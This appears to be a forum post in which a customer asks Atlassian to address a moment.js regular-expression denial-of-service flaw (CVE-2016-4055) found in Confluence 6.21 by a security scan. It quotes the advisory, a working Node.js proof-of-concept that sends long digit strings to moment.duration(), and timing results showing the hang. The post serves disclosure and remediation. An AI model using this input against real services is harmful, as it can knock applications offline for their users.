Hi,
Our security team performed a security scan on Confluence 6.21 and found a security issue; the details are provided below. We could only adopt it for production use if that risk is addressed by Atlassian. Our procurement department is waiting for us to obtain a mitigating solution for this issue before they procure Confluence.
Severity (Sonatype CVSS 3.0): 7.5
Weakness (Sonatype CWE): 400
Explanation: The moment package is vulnerable to a Regular Expression Denial of Service (ReDoS). The moment.duration() method in moment.js contains a regular expression, used to determine if an input is of the ASP.NET date format, that can cause an application to hang. The aspNetRegex, the variable's name in the code, causes very slow processing of exponentially long repetitive sequences leading to a Denial of Service (DoS) due to excessive resource consumption. A remote attacker could exploit this flaw by supplying a specially crafted request URL containing long repetitive sequences to cause the denial of service (DoS).
Proof of concept:

    var moment = require('moment');

    // Returns len+1 copies of chr (the loop uses <=, so one more than len).
    var genstr = function (len, chr) {
        var result = "";
        for (var i = 0; i <= len; i++) { result = result + chr; }
        return result;
    };

    // Feed moment.duration() ever longer runs of digits and time each call.
    // The original PoC used an undeclared global `i` in both loops, which is
    // why the COUNT values in the results below step 20000, 30001, 40002, ...
    for (var n = 20000; n <= 10000000; n = n + 10000) {
        console.log("COUNT: " + n);
        var str = '-' + genstr(n, '1');
        console.log("LENGTH: " + str.length);
        var start = process.hrtime();
        moment.duration(str);
        var end = process.hrtime(start);   // [seconds, nanoseconds]
        console.log(end);
    }

Results:

    $ node moment.js
    COUNT: 20000
    LENGTH: 20002
    [ 0, 618931029 ]
    COUNT: 30001
    LENGTH: 30003
    [ 1, 401413894 ]
    COUNT: 40002
    LENGTH: 40004
    [ 2, 437075303 ]
    COUNT: 50003
    LENGTH: 50005
    [ 3, 824664804 ]
    COUNT: 60004
    LENGTH: 60006
    [ 5, 651335262 ]
Reference Link: https://nodesecurity.io/advisories/55
Note: CVE-2016-4055 has been assigned to this vulnerability.
Detection: The application is vulnerable by using this package.
Recommendation: We recommend upgrading to a version of this component that is not vulnerable to this specific issue.
Categories: Data
Root Cause: moment 2.5.0
Advisories Project: https://nodesecurity.io/advisories/55
Our security team has asked me to direct you to How to Report a Security Issue.
It would be great if you could follow up on this forum to let the Community know the result.